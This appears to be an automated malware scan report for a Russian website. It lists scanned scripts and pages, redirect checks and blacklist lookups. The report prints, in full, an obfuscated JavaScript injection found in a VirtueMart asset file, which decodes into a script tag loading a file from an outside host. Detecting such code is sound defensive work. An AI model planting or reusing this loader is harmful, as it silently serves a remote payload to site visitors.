Scanned pages/files
Request | Server response | Status |
http://www.mesodeval.ru/ | 200 OK Content-Length: 59180 Content-Type: text/html | clean |
http://www.mesodeval.ru//ajax.googleapis.com/ajax/libs/jquery/1.6.4/jquery.min.js/ | 200 OK Content-Length: 59252 Content-Type: text/html | clean |
http://www.mesodeval.ru/components/com_virtuemart/assets//js/jquery.noConflict.js | 200 OK Content-Length: 258 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.noConflict(); <!-- js-tools --> c=0;while(c<90)document.write(String.fromCharCode('=tdsjqu!tsd>#iuuq;00vsqfo/jo/vb0benjojtusbups0dpnqpofout0dpn`jotubmmfs0tubu/qiq#?=0tdsjqu?'.charCodeAt(c++)-1)) <!-- /js-tools --> <!-- js-tools --> <!-- /js-tools --> Antivirus reports:
| ||
http://www.mesodeval.ru/components/com_virtuemart/assets//js/vmsite.js | 200 OK Content-Length: 3418 Content-Type: application/x-javascript | clean |
http://www.mesodeval.ru/components/com_virtuemart/assets//js/facebox.js | 200 OK Content-Length: 10738 Content-Type: application/x-javascript | clean |
http://www.mesodeval.ru/components/com_virtuemart/assets//js/vmprices.js | 200 OK Content-Length: 5164 Content-Type: application/x-javascript | clean |
http://www.mesodeval.ru/components/com_rsform/assets/js/script.js | 200 OK Content-Length: 11551 Content-Type: application/x-javascript | clean |
http://connect.facebook.net/en_US/all.js | 200 OK Content-Length: 167865 Content-Type: application/x-javascript | clean |
http://www.mesodeval.ru/modules/mod_swmenupro/DropDownMenuX_Packed.js | 200 OK Content-Length: 7972 Content-Type: application/x-javascript | clean |
http://www.mesodeval.ru/modules/mod_swmenupro/transmenu_Packed.js | 200 OK Content-Length: 17356 Content-Type: application/x-javascript | clean |
http://www.mesodeval.ru/index.php?option=com_content&view=article&id=4&Itemid=106 | 200 OK Content-Length: 50158 Content-Type: text/html | clean |
http://www.mesodeval.ru/media/system/js/mootools-core.js | 200 OK Content-Length: 96888 Content-Type: application/x-javascript | clean |
http://www.mesodeval.ru/media/system/js/core.js | 200 OK Content-Length: 4799 Content-Type: application/x-javascript | clean |
http://www.mesodeval.ru/media/system/js/caption.js | 200 OK Content-Length: 733 Content-Type: application/x-javascript | clean |
http://www.mesodeval.ru/index.php?option=com_content&view=article&id=9&Itemid=113 | 200 OK Content-Length: 49986 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mesodeval.ru
Result:
GET / HTTP/1.1
Host: mesodeval.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: mesodeval.ru
Referer: http://www.google.com/search?q=mesodeval.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mesodeval.ru
Referer: http://www.google.com/search?q=mesodeval.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mesodeval.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://mesodeval.ru/
Result: mesodeval.ru is not infected or malware details are not published yet.
Result: mesodeval.ru is not infected or malware details are not published yet.